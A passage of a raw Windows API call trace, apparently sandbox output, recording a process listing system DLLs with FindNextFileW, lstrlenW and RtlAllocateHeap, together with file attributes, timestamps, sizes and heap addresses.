ftLastWriteTime.dwLowDateTime=0xf25d2100, ftLastWriteTime.dwHighDateTime=0x1ca041e, nFileSizeHigh=0x0, nFileSizeLow=0xc00, dwReserved0=0x0, dwReserved1=0x0, cFileName="api-ms-win-core-string-l1-1-0.dll", cAlternateFileName="")) returned 1 [0030.645] lstrlenW (lpString="api-ms-win-core-string-l1-1-0.dll") returned 33 [0030.645] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0xc4) returned 0x7012a8 [0030.645] FindNextFileW (in: hFindFile=0x6fed78, lpFindFileData=0x6feb20 | out: lpFindFileData=0x6feb20*(dwFileAttributes=0x22, ftCreationTime.dwLowDateTime=0x2d241a90, ftCreationTime.dwHighDateTime=0x1ca040f, ftLastAccessTime.dwLowDateTime=0x2d241a90, ftLastAccessTime.dwHighDateTime=0x1ca040f, ftLastWriteTime.dwLowDateTime=0xf25d2100, ftLastWriteTime.dwHighDateTime=0x1ca041e, nFileSizeHigh=0x0, nFileSizeLow=0x1000, dwReserved0=0x0, dwReserved1=0x0, cFileName="api-ms-win-core-synch-l1-1-0.dll", cAlternateFileName="")) returned 1 [0030.645] lstrlenW (lpString="api-ms-win-core-synch-l1-1-0.dll") returned 32 [0030.645] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0xc2) returned 0x701378 [0030.646] FindNextFileW (in: hFindFile=0x6fed78, lpFindFileData=0x6feb20 | out: lpFindFileData=0x6feb20*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xb8576430, ftCreationTime.dwHighDateTime=0x1d2fab4, ftLastAccessTime.dwLowDateTime=0xb8576430, ftLastAccessTime.dwHighDateTime=0x1d2fab4, ftLastWriteTime.dwLowDateTime=0xd8cc12b9, ftLastWriteTime.dwHighDateTime=0x1d0c15a, nFileSizeHigh=0x0, nFileSizeLow=0x2f60, dwReserved0=0x0, dwReserved1=0x0, cFileName="api-ms-win-core-synch-l1-2-0.dll", cAlternateFileName="")) returned 1 [0030.646] lstrlenW (lpString="api-ms-win-core-synch-l1-2-0.dll") returned 32 [0030.646] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0xc2) returned 0x701448 [0030.646] FindNextFileW (in: hFindFile=0x6fed78, lpFindFileData=0x6feb20 | out: lpFindFileData=0x6feb20*(dwFileAttributes=0x22, ftCreationTime.dwLowDateTime=0x2d1f57d2, ftCreationTime.dwHighDateTime=0x1ca040f, ftLastAccessTime.dwLowDateTime=0x2d1f57d2, ftLastAccessTime.dwHighDateTime=0x1ca040f, ftLastWriteTime.dwLowDateTime=0xf25d2100, ftLastWriteTime.dwHighDateTime=0x1ca041e, nFileSizeHigh=0x0, nFileSizeLow=0x1000, dwReserved0=0x0, dwReserved1=0x0, cFileName="api-ms-win-core-sysinfo-l1-1-0.dll", cAlternateFileName="")) returned 1 [0030.646] lstrlenW (lpString="api-ms-win-core-sysinfo-l1-1-0.dll") returned 34 [0030.646] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0xc6) returned 0x701518 [0030.646] FindNextFileW (in: hFindFile=0x6fed78, lpFindFileData=0x6feb20 | out: lpFindFileData=0x6feb20*(dwFileAttributes=0x22, ftCreationTime.dwLowDateTime=0x2d267bef, ftCreationTime.dwHighDateTime=0x1ca040f, ftLastAccessTime.dwLowDateTime=0x2d267bef, ftLastAccessTime.dwHighDateTime=0x1ca040f, ftLastWriteTime.dwLowDateTime=0x2d265d70, ftLastWriteTime.dwHighDateTime=0x1ca040f, nFileSizeHigh=0x0, nFileSizeLow=0x1200, dwReserved0=0x0, dwReserved1=0x0, cFileName="api-ms-win-core-threadpool-l1-1-0.dll", cAlternateFileName="")) returned 1 [0030.646] lstrlenW (lpString="api-ms-win-core-threadpool-l1-1-0.dll") returned 37 [0030.646] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0xcc) returned 0x7030a0 [0030.646] FindNextFileW (in: hFindFile=0x6fed78, lpFindFileData=0x6feb20 | out: lpFindFileData=0x6feb20*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xb859c590, ftCreationTime.dwHighDateTime=0x1d2fab4, ftLastAccessTime.dwLowDateTime=0xb859c590, ftLastAccessTime.dwHighDateTime=0x1d2fab4, ftLastWriteTime.dwLowDateTime=0xd8cc12b9, ftLastWriteTime.dwHighDateTime=0x1d0c15a, nFileSizeHigh=0x0, nFileSizeLow=0x2d60, dwReserved0=0x0, dwReserved1=0x0, cFileName="api-ms-win-core-timezone-l1-1-0.dll", cAlternateFileName="")) returned 1 [0030.646] lstrlenW (lpString="api-ms-win-core-timezone-l1-1-0.dll") returned 35 [0030.646] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0xc8) returned 0x7015e8 [0030.646] FindNextFileW (in: hFindFile=0x6fed78, lpFindFileData=0x6feb20 | out: lpFindFileData=0x6feb20*(dwFileAttributes=0x22, ftCreationTime.dwLowDateTime=0x2d21b931, ftCreationTime.dwHighDateTime=0x1ca040f, ftLastAccessTime.dwLowDateTime=0x2d21b931, ftLastAccessTime.dwHighDateTime=0x1ca040f, ftLastWriteTime.dwLowDateTime=0x2d21a280, ftLastWriteTime.dwHighDateTime=0x1ca040f, nFileSizeHigh=0x0, nFileSizeLow=0xc00, dwReserved0=0x0, dwReserved1=0x0, cFileName="api-ms-win-core-util-l1-1-0.dll", cAlternateFileName="")) returned 1 [0030.646] lstrlenW (lpString="api-ms-win-core-util-l1-1-0.dll") returned 31 [0030.646] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0xc0) returned 0x7016b8 [0030.646] FindNextFileW (in: hFindFile=0x6fed78, lpFindFileData=0x6feb20 | out: lpFindFileData=0x6feb20*(dwFileAttributes=0x22, ftCreationTime.dwLowDateTime=0x2d9fe1dc, ftCreationTime.dwHighDateTime=0x1ca040f, ftLastAccessTime.dwLowDateTime=0x2d9fe1dc, ftLastAccessTime.dwHighDateTime=0x1ca040f, ftLastWriteTime.dwLowDateTime=0x2d9fd330, ftLastWriteTime.dwHighDateTime=0x1ca040f, nFileSizeHigh=0x0, nFileSizeLow=0xe00, dwReserved0=0x0, dwReserved1=0x0, cFileName="api-ms-win-core-xstate-l1-1-0.dll", cAlternateFileName="")) returned 1 [0030.647] lstrlenW (lpString="api-ms-win-core-xstate-l1-1-0.dll") returned 33 [0030.647] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0xc4) returned 0x701780 [0030.647] FindNextFileW (in: hFindFile=0x6fed78, lpFindFileData=0x6feb20 | out: lpFindFileData=0x6feb20*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xb84ddeb0, ftCreationTime.dwHighDateTime=0x1d2fab4, ftLastAccessTime.dwLowDateTime=0xb84ddeb0, ftLastAccessTime.dwHighDateTime=0x1d2fab4, ftLastWriteTime.dwLowDateTime=0xd8cc12b9, ftLastWriteTime.dwHighDateTime=0x1d0c15a, nFileSizeHigh=0x0, nFileSizeLow=0x2d60, dwReserved0=0x0, dwReserved1=0x0, cFileName="api-ms-win-core-xstate-l2-1-0.dll", cAlternateFileName="")) returned 1 [0030.647] lstrlenW (lpString="api-ms-win-core-xstate-l2-1-0.dll") returned 33 [0030.647] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0xc4) returned 0x701850 [0030.647] FindNextFileW (in: hFindFile=0x6fed78, lpFindFileData=0x6feb20 | out: lpFindFileData=0x6feb20*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xb8576430, ftCreationTime.dwHighDateTime=0x1d2fab4, ftLastAccessTime.dwLowDateTime=0xb8576430, ftLastAccessTime.dwHighDateTime=0x1d2fab4, ftLastWriteTime.dwLowDateTime=0xd8cc12b9, ftLastWriteTime.dwHighDateTime=0x1d0c15a, nFileSizeHigh=0x0, nFileSizeLow=0x3160, dwReserved0=0x0, dwReserved1=0x0, cFileName="api-ms-win-crt-conio-l1-1-0.dll", cAlternateFileName="")) returned 1 [0030.647] lstrlenW (lpString="api-ms-win-crt-conio-l1-1-0.dll") returned 31 [0030.647] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0xc0) returned 0x701920 [0030.647] FindNextFileW (in: hFindFile=0x6fed78, lpFindFileData=0x6feb20 | out: lpFindFileData=0x6feb20*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xb852a170, ftCreationTime.dwHighDateTime=0x1d2fab4, ftLastAccessTime.dwLowDateTime=0xb852a170, ftLastAccessTime.dwHighDateTime=0x1d2fab4, ftLastWriteTime.dwLowDateTime=0xd8ce741a, ftLastWriteTime.dwHighDateTime=0x1d0c15a, nFileSizeHigh=0x0, nFileSizeLow=0x3d60, dwReserved0=0x0, dwReserved1=0x0, cFileName="api-ms-win-crt-convert-l1-1-0.dll", cAlternateFileName="")) returned 1 [0030.647] lstrlenW (lpString="api-ms-win-crt-convert-l1-1-0.dll") returned 33 [0030.647] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0xc4) returned 0x704fc8 [0030.647] FindNextFileW (in: hFindFile=0x6fed78, lpFindFileData=0x6feb20 | out: lpFindFileData=0x6feb20*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xb8504010, ftCreationTime.dwHighDateTime=0x1d2fab4, ftLastAccessTime.dwLowDateTime=0xb8504010, ftLastAccessTime.dwHighDateTime=0x1d2fab4, ftLastWriteTime.dwLowDateTime=0xd8ce741a, ftLastWriteTime.dwHighDateTime=0x1d0c15a, nFileSizeHigh=0x0, nFileSizeLow=0x2f60, dwReserved0=0x0, dwReserved1=0x0, cFileName="api-ms-win-crt-environment-l1-1-0.dll", cAlternateFileName="")) returned 1 [0030.647] lstrlenW (lpString="api-ms-win-crt-environment-l1-1-0.dll") returned 37 [0030.647] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0xcc) returned 0x703178 [0030.647] FindNextFileW (in: hFindFile=0x6fed78, lpFindFileData=0x6feb20 | out: lpFindFileData=0x6feb20*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xb852a170, ftCreationTime.dwHighDateTime=0x1d2fab4, ftLastAccessTime.dwLowDateTime=0xb852a170, ftLastAccessTime.dwHighDateTime=0x1d2fab4, ftLastWriteTime.dwLowDateTime=0xd8ce741a, ftLastWriteTime.dwHighDateTime=0x1d0c15a, nFileSizeHigh=0x0, nFileSizeLow=0x3560, dwReserved0=0x0, dwReserved1=0x0, cFileName="api-ms-win-crt-filesystem-l1-1-0.dll", cAlternateFileName="")) returned 1 [0030.648] lstrlenW (lpString="api-ms-win-crt-filesystem-l1-1-0.dll") returned 36 [0030.648] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0xca) returned 0x703250 [0030.648] FindNextFileW (in: hFindFile=0x6fed78, lpFindFileData=0x6feb20 | out: lpFindFileData=0x6feb20*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xb8491bf0, ftCreationTime.dwHighDateTime=0x1d2fab4, ftLastAccessTime.dwLowDateTime=0xb8491bf0, ftLastAccessTime.dwHighDateTime=0x1d2fab4, ftLastWriteTime.dwLowDateTime=0xd8ce741a, ftLastWriteTime.dwHighDateTime=0x1d0c15a, nFileSizeHigh=0x0, nFileSizeLow=0x3160, dwReserved0=0x0, dwReserved1=0x0, cFileName="api-ms-win-crt-heap-l1-1-0.dll", cAlternateFileName="")) returned 1 [0030.648] lstrlenW (lpString="api-ms-win-crt-heap-l1-1-0.dll") returned 30 [0030.648] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0xbe) returned 0x7019e8 [0030.648] FindNextFileW (in: hFindFile=0x6fed78, lpFindFileData=0x6feb20 | out: lpFindFileData=0x6feb20*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xb8491bf0, ftCreationTime.dwHighDateTime=0x1d2fab4, ftLastAccessTime.dwLowDateTime=0xb8491bf0, ftLastAccessTime.dwHighDateTime=0x1d2fab4, ftLastWriteTime.dwLowDateTime=0xd8ce741a, ftLastWriteTime.dwHighDateTime=0x1d0c15a, nFileSizeHigh=0x0, nFileSizeLow=0x2f60, dwReserved0=0x0, dwReserved1=0x0, cFileName="api-ms-win-crt-locale-l1-1-0.dll", cAlternateFileName="")) returned 1 [0030.648] lstrlenW (lpString="api-ms-win-crt-locale-l1-1-0.dll") returned 32 [0030.648] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0xc2) returned 0x705098 [0030.648] FindNextFileW (in: hFindFile=0x6fed78, lpFindFileData=0x6feb20 | out: lpFindFileData=0x6feb20*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xb846ba90, ftCreationTime.dwHighDateTime=0x1d2fab4, ftLastAccessTime.dwLowDateTime=0xb846ba90, ftLastAccessTime.dwHighDateTime=0x1d2fab4, ftLastWriteTime.dwLowDateTime=0xd8d0d57b, ftLastWriteTime.dwHighDateTime=0x1d0c15a, nFileSizeHigh=0x0, nFileSizeLow=0x5760, dwReserved0=0x0, dwReserved1=0x0, cFileName="api-ms-win-crt-math-l1-1-0.dll", cAlternateFileName="")) returned 1 [0030.648] lstrlenW (lpString="api-ms-win-crt-math-l1-1-0.dll") returned 30 [0030.648] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0xbe) returned 0x701ab0 [0030.648] FindNextFileW (in: hFindFile=0x6fed78, lpFindFileData=0x6feb20 | out: lpFindFileData=0x6feb20*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xb8445930, ftCreationTime.dwHighDateTime=0x1d2fab4, ftLastAccessTime.dwLowDateTime=0xb8445930, ftLastAccessTime.dwHighDateTime=0x1d2fab4, ftLastWriteTime.dwLowDateTime=0xd8d0d57b, ftLastWriteTime.dwHighDateTime=0x1d0c15a, nFileSizeHigh=0x0, nFileSizeLow=0x4d60, dwReserved0=0x0, dwReserved1=0x0, cFileName="api-ms-win-crt-multibyte-l1-1-0.dll", cAlternateFileName="")) returned 1 [0030.648] lstrlenW (lpString="api-ms-win-crt-multibyte-l1-1-0.dll") returned 35 [0030.648] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0xc8) returned 0x705168 [0030.648] FindNextFileW (in: hFindFile=0x6fed78, lpFindFileData=0x6feb20 | out: lpFindFileData=0x6feb20*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xb8125c50, ftCreationTime.dwHighDateTime=0x1d2fab4, ftLastAccessTime.dwLowDateTime=0xb8125c50, ftLastAccessTime.dwHighDateTime=0x1d2fab4, ftLastWriteTime.dwLowDateTime=0xd8d0d57b, ftLastWriteTime.dwHighDateTime=0x1d0c15a, nFileSizeHigh=0x0, nFileSizeLow=0x10360, dwReserved0=0x0, dwReserved1=0x0, cFileName="api-ms-win-crt-private-l1-1-0.dll", cAlternateFileName="")) returned 1 [0030.648] lstrlenW (lpString="api-ms-win-crt-private-l1-1-0.dll") returned 33 [0030.648] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0xc4) returned 0x705238 [0030.649] FindNextFileW (in: hFindFile=0x6fed78, lpFindFileData=0x6feb20 | out: lpFindFileData=0x6feb20*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xb84ddeb0, ftCreationTime.dwHighDateTime=0x1d2fab4, ftLastAccessTime.dwLowDateTime=0xb84ddeb0, ftLastAccessTime.dwHighDateTime=0x1d2fab4, ftLastWriteTime.dwLowDateTime=0xd8d336dc, ftLastWriteTime.dwHighDateTime=0x1d0c15a, nFileSizeHigh=0x0, nFileSizeLow=0x3160, dwReserved0=0x0, dwReserved1=0x0, cFileName="api-ms-win-crt-process-l1-1-0.dll", cAlternateFileName="")) returned 1 [0030.649] lstrlenW (lpString="api-ms-win-crt-process-l1-1-0.dll") returned 33 [0030.649] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0xc4) returned 0x705308 [0030.649] FindNextFileW (in: hFindFile=0x6fed78, lpFindFileData=0x6feb20 | out: lpFindFileData=0x6feb20*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xb84b7d50, ftCreationTime.dwHighDateTime=0x1d2fab4, ftLastAccessTime.dwLowDateTime=0xb84b7d50, ftLastAccessTime.dwHighDateTime=0x1d2fab4, ftLastWriteTime.dwLowDateTime=0xd8d336dc, ftLastWriteTime.dwHighDateTime=0x1d0c15a, nFileSizeHigh=0x0, nFileSizeLow=0x3f60, dwReserved0=0x0, dwReserved1=0x0, cFileName="api-ms-win-crt-runtime-l1-1-0.dll", cAlternateFileName="")) returned 1 [0030.649] lstrlenW (lpString="api-ms-win-crt-runtime-l1-1-0.dll") returned 33 [0030.649] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0xc4) returned 0x7053d8 [0030.649] FindNextFileW (in: hFindFile=0x6fed78, lpFindFileData=0x6feb20 | out: lpFindFileData=0x6feb20*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xb84ddeb0, ftCreationTime.dwHighDateTime=0x1d2fab4, ftLastAccessTime.dwLowDateTime=0xb84ddeb0, ftLastAccessTime.dwHighDateTime=0x1d2fab4, ftLastWriteTime.dwLowDateTime=0xd8d336dc, ftLastWriteTime.dwHighDateTime=0x1d0c15a, nFileSizeHigh=0x0, nFileSizeLow=0x4560, dwReserved0=0x0, dwReserved1=0x0, cFileName="api-ms-win-crt-stdio-l1-1-0.dll", cAlternateFileName="")) returned 1 [0030.649] lstrlenW (lpString="api-ms-win-crt-stdio-l1-1-0.dll") returned 31 [0030.649] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0xc0) returned 0x701b78 [0030.649] FindNextFileW (in: hFindFile=0x6fed78, lpFindFileData=0x6feb20 | out: lpFindFileData=0x6feb20*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xb85502d0, ftCreationTime.dwHighDateTime=0x1d2fab4, ftLastAccessTime.dwLowDateTime=0xb85502d0, ftLastAccessTime.dwHighDateTime=0x1d2fab4, ftLastWriteTime.dwLowDateTime=0xd8d336dc, ftLastWriteTime.dwHighDateTime=0x1d0c15a, nFileSizeHigh=0x0, nFileSizeLow=0x4560, dwReserved0=0x0, dwReserved1=0x0, cFileName="api-ms-win-crt-string-l1-1-0.dll", cAlternateFileName="")) returned 1 [0030.649] lstrlenW (lpString="api-ms-win-crt-string-l1-1-0.dll") returned 32 [0030.649] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0xc2) returned 0x7054a8 [0030.649] FindNextFileW (in: hFindFile=0x6fed78, lpFindFileData=0x6feb20 | out: lpFindFileData=0x6feb20*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xb84ddeb0, ftCreationTime.dwHighDateTime=0x1d2fab4, ftLastAccessTime.dwLowDateTime=0xb84ddeb0, ftLastAccessTime.dwHighDateTime=0x1d2fab4, ftLastWriteTime.dwLowDateTime=0xd8d5983d, ftLastWriteTime.dwHighDateTime=0x1d0c15a, nFileSizeHigh=0x0, nFileSizeLow=0x3760, dwReserved0=0x0, dwReserved1=0x0, cFileName="api-ms-win-crt-time-l1-1-0.dll", cAlternateFileName="")) returned 1 [0030.649] lstrlenW (lpString="api-ms-win-crt-time-l1-1-0.dll") returned 30 [0030.649] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0xbe) returned 0x706fb0 [0030.649] FindNextFileW (in: hFindFile=0x6fed78, lpFindFileData=0x6feb20 | out: lpFindFileData=0x6feb20*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xb8576430, ftCreationTime.dwHighDateTime=0x1d2fab4, ftLastAccessTime.dwLowDateTime=0xb8576430, ftLastAccessTime.dwHighDateTime=0x1d2fab4, ftLastWriteTime.dwLowDateTime=0xd8d5983d, ftLastWriteTime.dwHighDateTime=0x1d0c15a, nFileSizeHigh=0x0, nFileSizeLow=0x2f60, dwReserved0=0x0, dwReserved1=0x0, cFileName="api-ms-win-crt-utility-l1-1-0.dll", cAlternateFileName="")) returned 1 [0030.650] lstrlenW (lpString="api-ms-win-crt-utility-l1-1-0.dll") returned 33 [0030.650] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0xc4) returned 0x705578 [0030.650] FindNextFileW (in: hFindFile=0x6fed78, lpFindFileData=0x6feb20 | out: lpFindFileData=0x6feb20*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xb8504010, ftCreationTime.dwHighDateTime=0x1d2fab4, ftLastAccessTime.dwLowDateTime=0xb8504010, ftLastAccessTime.dwHighDateTime=0x1d2fab4, ftLastWriteTime.dwLowDateTime=0xd8d5983d, ftLastWriteTime.dwHighDateTime=0x1d0c15a, nFileSizeHigh=0x0, nFileSizeLow=0x2d60, dwReserved0=0x0, dwReserved1=0x0, cFileName="api-ms-win-eventing-provider-l1-1-0.dll", cAlternateFileName="")) returned 1 [0030.650] lstrlenW (lpString="api-ms-win-eventing-provider-l1-1-0.dll") returned 39 [0030.650] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0xd0) returned 0x703328 [0030.650] FindNextFileW (in: hFindFile=0x6fed78, lpFindFileData=0x6feb20 | out: lpFindFileData=0x6feb20*(dwFileAttributes=0x22, ftCreationTime.dwLowDateTime=0x2d1833b5, ftCreationTime.dwHighDateTime=0x1ca040f, ftLastAccessTime.dwLowDateTime=0x2d1833b5, ftLastAccessTime.dwHighDateTime=0x1ca040f, ftLastWriteTime.dwLowDateTime=0x2d1a7690, ftLastWriteTime.dwHighDateTime=0x1ca040f, nFileSizeHigh=0x0, nFileSizeLow=0x1800, dwReserved0=0x0, dwReserved1=0x0, cFileName="api-ms-win-security-base-l1-1-0.dll", cAlternateFileName="")) returned 1 [0030.650] lstrlenW (lpString="api-ms-win-security-base-l1-1-0.dll") returned 35 [0030.651] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0xc8) returned 0x705648 [0030.651] FindNextFileW (in: hFindFile=0x6fed78, lpFindFileData=0x6feb20 | out: lpFindFileData=0x6feb20*(dwFileAttributes=0x22, ftCreationTime.dwLowDateTime=0x4f381b9f, ftCreationTime.dwHighDateTime=0x1ca040f, ftLastAccessTime.dwLowDateTime=0x4f381b9f, ftLastAccessTime.dwHighDateTime=0x1ca040f, ftLastWriteTime.dwLowDateTime=0x4f37fbd0, ftLastWriteTime.dwHighDateTime=0x1ca040f, nFileSizeHigh=0x0, nFileSizeLow=0xe00, dwReserved0=0x0, dwReserved1=0x0, cFileName="api-ms-win-security-lsalookup-l1-1-0.dll", cAlternateFileName="")) returned 1 [0030.651] lstrlenW (lpString="api-ms-win-security-lsalookup-l1-1-0.dll") returned 40 [0030.651] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0xd2) returned 0x707078 [0030.651] FindNextFileW (in: hFindFile=0x6fed78, lpFindFileData=0x6feb20 | out: lpFindFileData=0x6feb20*(dwFileAttributes=0x22, ftCreationTime.dwLowDateTime=0x4f3a7cfe, ftCreationTime.dwHighDateTime=0x1ca040f, ftLastAccessTime.dwLowDateTime=0x4f3a7cfe, ftLastAccessTime.dwHighDateTime=0x1ca040f, ftLastWriteTime.dwLowDateTime=0x4f3a6cd0, ftLastWriteTime.dwHighDateTime=0x1ca040f, nFileSizeHigh=0x0, nFileSizeLow=0xc00, dwReserved0=0x0, dwReserved1=0x0, cFileName="api-ms-win-security-sddl-l1-1-0.dll", cAlternateFileName="")) returned 1 [0030.651] lstrlenW (lpString="api-ms-win-security-sddl-l1-1-0.dll") returned 35 [0030.651] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0xc8) returned 0x705718 [0030.651] FindNextFileW (in: hFindFile=0x6fed78, lpFindFileData=0x6feb20 | out: lpFindFileData=0x6feb20*(dwFileAttributes=0x22, ftCreationTime.dwLowDateTime=0x2d15d256, ftCreationTime.dwHighDateTime=0x1ca040f, ftLastAccessTime.dwLowDateTime=0x2d15d256, ftLastAccessTime.dwHighDateTime=0x1ca040f, ftLastWriteTime.dwLowDateTime=0xf25d2100, ftLastWriteTime.dwHighDateTime=0x1ca041e, nFileSizeHigh=0x0, nFileSizeLow=0xa00, dwReserved0=0x0, dwReserved1=0x0, cFileName="api-ms-win-service-core-l1-1-0.dll", cAlternateFileName="")) returned 1 [0030.651] lstrlenW (lpString="api-ms-win-service-core-l1-1-0.dll") returned 34 [0030.651] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0xc6) returned 0x7057e8 [0030.651] FindNextFileW (in: hFindFile=0x6fed78, lpFindFileData=0x6feb20 | out: lpFindFileData=0x6feb20*(dwFileAttributes=0x22, ftCreationTime.dwLowDateTime=0x2d1370f7, ftCreationTime.dwHighDateTime=0x1ca040f, ftLastAccessTime.dwLowDateTime=0x2d1370f7, ftLastAccessTime.dwHighDateTime=0x1ca040f, ftLastWriteTime.dwLowDateTime=0xf25d2100, ftLastWriteTime.dwHighDateTime=0x1ca041e, nFileSizeHigh=0x0, nFileSizeLow=0xa00, dwReserved0=0x0, dwReserved1=0x0, cFileName="api-ms-win-service-management-l1-1-0.dll", cAlternateFileName="")) returned 1 [0030.651] lstrlenW (lpString="api-ms-win-service-management-l1-1-0.dll") returned 40 [0030.651] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0xd2) returned 0x707158 [0030.651] FindNextFileW (in: hFindFile=0x6fed78, lpFindFileData=0x6feb20 | out: lpFindFileData=0x6feb20*(dwFileAttributes=0x22, ftCreationTime.dwLowDateTime=0x2d09eb7b, ftCreationTime.dwHighDateTime=0x1ca040f, ftLastAccessTime.dwLowDateTime=0x2d09eb7b, ftLastAccessTime.dwHighDateTime=0x1ca040f, ftLastWriteTime.dwLowDateTime=0xf25d2100, ftLastWriteTime.dwHighDateTime=0x1ca041e, nFileSizeHigh=0x0, nFileSizeLow=0xa00, dwReserved0=0x0, dwReserved1=0x0, cFileName="api-ms-win-service-management-l2-1-0.dll", cAlternateFileName="")) returned 1 [0030.651] lstrlenW (lpString="api-ms-win-service-management-l2-1-0.dll") returned 40 [0030.651] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0xd2) returned 0x707238 [0030.651] FindNextFileW (in: hFindFile=0x6fed78, lpFindFileData=0x6feb20 | out: lpFindFileData=0x6feb20*(dwFileAttributes=0x22, ftCreationTime.dwLowDateTime=0x2d267bef, ftCreationTime.dwHighDateTime=0x1ca040f, ftLastAccessTime.dwLowDateTime=0x2d267bef, ftLastAccessTime.dwHighDateTime=0x1ca040f, ftLastWriteTime.dwLowDateTime=0xf25d2100, ftLastWriteTime.dwHighDateTime=0x1ca041e, nFileSizeHigh=0x0, nFileSizeLow=0xe00, dwReserved0=0x0, dwReserved1=0x0, cFileName="api-ms-win-service-winsvc-l1-1-0.dll", cAlternateFileName="")) returned 1 [0030.651] lstrlenW (lpString="api-ms-win-service-winsvc-l1-1-0.dll") returned 36 [0030.652] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0xca) returned 0x703400 [0030.652] FindNextFileW (in: hFindFile=0x6fed78, lpFindFileData=0x6feb20 | out: lpFindFileData=0x6feb20*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7821a163, ftCreationTime.dwHighDateTime=0x1ca0410, ftLastAccessTime.dwLowDateTime=0x7821a163, ftLastAccessTime.dwHighDateTime=0x1ca0410, ftLastWriteTime.dwLowDateTime=0x7e595a10, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x3c00, dwReserved0=0x0, dwReserved1=0x0, cFileName="apilogen.dll", cAlternateFileName="")) returned 1 [0030.652] lstrlenW (lpString="apilogen.dll") returned 12 [0030.652] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x9a) returned 0x707318 [0030.652] FindNextFileW (in: hFindFile=0x6fed78, lpFindFileData=0x6feb20 | out: lpFindFileData=0x6feb20*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc1f2f92c, ftCreationTime.dwHighDateTime=0x1ca0417, ftLastAccessTime.dwLowDateTime=0xc1f2f92c, ftLastAccessTime.dwHighDateTime=0x1ca0417, ftLastWriteTime.dwLowDateTime=0x7e595a10, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x36000, dwReserved0=0x0, dwReserved1=0x0, cFileName="apircl.dll", cAlternateFileName="")) returned 1 [0030.652] lstrlenW (lpString="apircl.dll") returned 10 [0030.652] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x96) returned 0x7073c0 [0030.652] FindNextFileW (in: hFindFile=0x6fed78, lpFindFileData=0x6feb20 | out: lpFindFileData=0x6feb20*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x2de74afe, ftCreationTime.dwHighDateTime=0x1ca040f, ftLastAccessTime.dwLowDateTime=0x2de74afe, ftLastAccessTime.dwHighDateTime=0x1ca040f, ftLastWriteTime.dwLowDateTime=0xf261dbf0, ftLastWriteTime.dwHighDateTime=0x1ca041e, nFileSizeHigh=0x0, nFileSizeLow=0x1a00, dwReserved0=0x0, dwReserved1=0x0, cFileName="apisetschema.dll", cAlternateFileName="")) returned 1 [0030.652] lstrlenW (lpString="apisetschema.dll") returned 16 [0030.652] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0xa2) returned 0x707460 [0030.652] FindNextFileW (in: hFindFile=0x6fed78, lpFindFileData=0x6feb20 | out: lpFindFileData=0x6feb20*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x92c3856c, ftCreationTime.dwHighDateTime=0x1cb892b, 